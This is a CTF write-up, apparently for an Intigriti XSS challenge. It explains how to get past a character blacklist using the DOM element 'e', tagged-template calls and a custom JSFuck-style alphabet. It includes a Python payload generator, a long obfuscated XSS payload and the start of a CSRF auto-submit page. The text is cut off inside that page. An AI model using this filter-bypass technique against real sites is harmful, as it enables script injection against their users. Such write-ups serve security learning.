-It was found that the letter `e` is permitted as user input. It was also found that there is an HTLM element using the `id="e"`. Therefore, this HtML element is accesible from Javascript just using the variable `e`:\
-![](https://i.imgur.com/Slq2Xal.png)
-
-Also, it’s important to know that in JS you can **access the attributes of an objects with a dot or with a string between brackets**. So, you can access the `domain` attribute of a `document` object in either of the following ways:
-
-```javascript
-document.domain
-document["domain"]
-```
-
-And the same happens with attributes that are functions (methods):
-
-```javascript
-document.write("1")
-document["write"]("1")
-```
-
-Then, from the `e` HTML element it’s possible to access the `document` object using something like:
-
-```javascript
-e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]
-```
-
-### Calling a function without parenthesis with JS code as string <a href="#calling-a-function-without-parenthesis-with-js-code-as-string" id="calling-a-function-without-parenthesis-with-js-code-as-string"></a>
-
-From the object `document` it’s possible to call the `write` function to **write arbitrary HTML text that the browser will execute**.\
-However, as the `()` characters are **forbidden**, it’s not possible to call the function using them. Anyway, it’s possible to call a function using **backtips** (\`\`).\
-Moreover, it’s possible to put as string javascript code that is going to be executed using `${...}` like:
-
-```javascript
-`${"alert(document.location)"}`
-```
-
-Therefore, combining the `document` object access with this technique to execute functions without parenthesis it’s possible to **execute an alert using**:
-
-```javascript
-e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]["write"]`${"<script>alert(document.location)</script>"}`
-```
-
-You can test this code in a javascript console inside the page [https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php)
-
-### Final forbidden characters bypass <a href="#final-forbidden-characters-bypass" id="final-forbidden-characters-bypass"></a>
-
-However, there is still one problem left. Most of the characters of the exploit are **forbidden** as they appear in the regexp `/[a-df-z<>()!\\='"]/gi`. But note how all the **forbidden characters are strings** inside the exploit and the **not string characters in the exploit (e\[]\`${}) are allowed**.\
-This means that if it’s possible to **generate the forbidden charaters as strings from the allowed characters**, it’s possible to generate the exploit.\
-In order to do this I have generated a [JSFuck](http://www.jsfuck.com) like alphabet to generate the necesary characters (_this alphabet is custom for this challenge_).\
-You can **see the full alphabet inside the exploit code** (which can be found in the next subsection and in the file _exploit.txt_).
-
-For example, in order to **generate the letter `a`** it’s possible to access **`[[]/e+e][0][1]`** as `[[]/e+e][0]` generates the string `"NaN[object HTMLProgressElement]"` or in order to generate the **letter `f`** its possible to access the **5th char of `[[][[]]+e][0]`** as that expression generates the string `"undefined[object HTMLProgressElement]"`.\
-Using these tricks and some more complex ones it was possible to **generate all the characters (letters and symbols) of the strings contained** in the exploit:
-
-```javascript
-e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]["write"]`${"<script>alert(document.location)</script>"}`
-```
-
-### Exploit Code <a href="#exploit-code" id="exploit-code"></a>
-
-This is the python exploit used to generate the final exploit. If you execute it, it will print the exploit:
-
-```python
-#JS Specific Direct Alphabet
-x = {
-    "1": "1",
-    ".": ".",
-    "[": "[e+e][0][0]",
-    "]": "[e+e][0][27]",
-    "/": "[/e/+e][0][0]",
-    "a": "[[]/e+e][0][1]",
-    "b": "[e+e][0][2]",
-    "c": "[e+e][0][5]",
-    "d": "[[][[]]+e][0][2]",
-    "e": "[e+e][0][4]",
-    "f": "[[][[]]+e][0][4]",
-    "g": "[e+e][0][15]",
-    "H": "[e+e][0][8]",
-    "i": "[[][[]]+e][0][5]",
-    "j": "[e+e][0][3]",
-    "L": "[e+e][0][11]",
-    "l": "[e+e][0][21]",
-    "M": "[e+e][0][10]",
-    "n": "[[][[]]+e][0][1]",
-    "N": "[[]/e+e][0][0]",
-    "o": "[e+e][0][1]",
-    "r": "[e+e][0][13]",
-    "s": "[e+e][0][18]",
-    "t": "[e+e][0][6]",
-    "T": "[e+e][0][9]",
-    "u": "[[][[]]+e][0][0]",
-}
-
-#JS Dependent Alphabet
-#The following alphabet will use previously obtained characters
-#Note that this way of getting the characters are custom for the abused HTML
-
-outerHTML = '+'.join(x[k] for k in 'outerHTML')
-
-x['p'] = f'e[{outerHTML}][1]'
-x['y'] = f'e[{outerHTML}][39]'
-x['<'] = f'e[{outerHTML}][0]'
-x['>'] = f'e[{outerHTML}][62]'
-x['"'] = f'e[{outerHTML}][13]'
-
-parentNode = '+'.join(x[k] for k in 'parentNode')
-document =f'e[{parentNode}][{parentNode}][{parentNode}][{parentNode}][{parentNode}]'
-
-x['h'] = f'e[{parentNode}][{parentNode}][{outerHTML}][15]'
-
-children = '+'.join(x[k] for k in 'children')
-captcha = '+'.join(x[k] for k in 'captcha')
-
-x['w'] = f'e[{parentNode}][{parentNode}][{parentNode}][{children}][{captcha}][{x["g"]}][{outerHTML}][35]'
-write = '+'.join(x[k] for k in 'write')
-
-x['m'] = f'e[{parentNode}][{parentNode}][{parentNode}][{children}][{captcha}][{x["g"]}][{outerHTML}][38]'
-x['('] = f'e[{parentNode}][{parentNode}][{parentNode}][{children}][{captcha}][{x["g"]}][{outerHTML}][42]'
-x[')'] = f'e[{parentNode}][{parentNode}][{parentNode}][{children}][{captcha}][{x["g"]}][{outerHTML}][43]'
-
-
-# Exploit generation
-payload_text = '<script>alert(document["domain"])</script>'
-payload = '+'.join(x[k] for k in payload_text)
-
-txt = f'{document}[{write}]'+'`${['+payload+']}`'
-
-print(txt) #Write the exploit to stdout
-```
-
-### Exploitation <a href="#exploitation" id="exploitation"></a>
-
-In order to generate the exploit just execute the previous python code. If you prefer, you can also copy/paste it from here:
-
-```
-e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[][[]]+e][0][5]+[e+e][0][21]+[[][[]]+e][0][2]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]][[e+e][0][5]+[[]/e+e][0][1]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[]/e+e][0][1]][[e+e][0][15]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][35]+[e+e][0][13]+[[][[]]+e][0][5]+[e+e][0][6]+[e+e][0][4]]`${[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][0]+[e+e][0][18]+[e+e][0][5]+[e+e][0][13]+[[][[]]+e][0][5]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][62]+[[]/e+e][0][1]+[e+e][0][21]+[e+e][0][4]+[e+e][0][13]+[e+e][0][6]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[][[]]+e][0][5]+[e+e][0][21]+[[][[]]+e][0][2]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]][[e+e][0][5]+[[]/e+e][0][1]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[]/e+e][0][1]][[e+e][0][15]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][42]+[[][[]]+e][0][2]+[e+e][0][1]+[e+e][0][5]+[[][[]]+e][0][0]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[][[]]+e][0][5]+[e+e][0][21]+[[][[]]+e][0][2]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]][[e+e][0][5]+[[]/e+e][0][1]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[]/e+e][0][1]][[e+e][0][15]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][38]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[e+e][0][0]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][13]+[[][[]]+e][0][2]+[e+e][0][1]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[][[]]+e][0][5]+[e+e][0][21]+[[][[]]+e][0][2]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]][[e+e][0][5]+[[]/e+e][0][1]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[]/e+e][0][1]][[e+e][0][15]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][38]+[[]/e+e][0][1]+[[][[]]+e][0][5]+[[][[]]+e][0][1]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][13]+[e+e][0][27]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[][[]]+e][0][5]+[e+e][0][21]+[[][[]]+e][0][2]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]][[e+e][0][5]+[[]/e+e][0][1]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+[e+e][0][5]+e[e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[[]/e+e][0][1]+[e+e][0][13]+[e+e][0][4]+[[][[]]+e][0][1]+[e+e][0][6]+[[]/e+e][0][0]+[e+e][0][1]+[[][[]]+e][0][2]+[e+e][0][4]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][15]+[[]/e+e][0][1]][[e+e][0][15]][[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][43]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][0]+[/e/+e][0][0]+[e+e][0][18]+[e+e][0][5]+[e+e][0][13]+[[][[]]+e][0][5]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][1]+[e+e][0][6]+e[[e+e][0][1]+[[][[]]+e][0][0]+[e+e][0][6]+[e+e][0][4]+[e+e][0][13]+[e+e][0][8]+[e+e][0][9]+[e+e][0][10]+[e+e][0][11]][62]]}`
-```
-
-Then, you need to **generate a HTML page** that, when loaded, it’s going to **redirect** the victim to the **challenge** page **setting the exploit in the captcha form**. The following code can be use for this purpose (_note that the exploit is URL encoded_):
-
-```markup
-  <!-- CSRF PoC - generated by Burp Suite Professional -->
-  <body>
-  <script>history.pushState('', '', '/')</script>
-    <form action="https://challenge-0521.intigriti.io/captcha.php" method="POST">
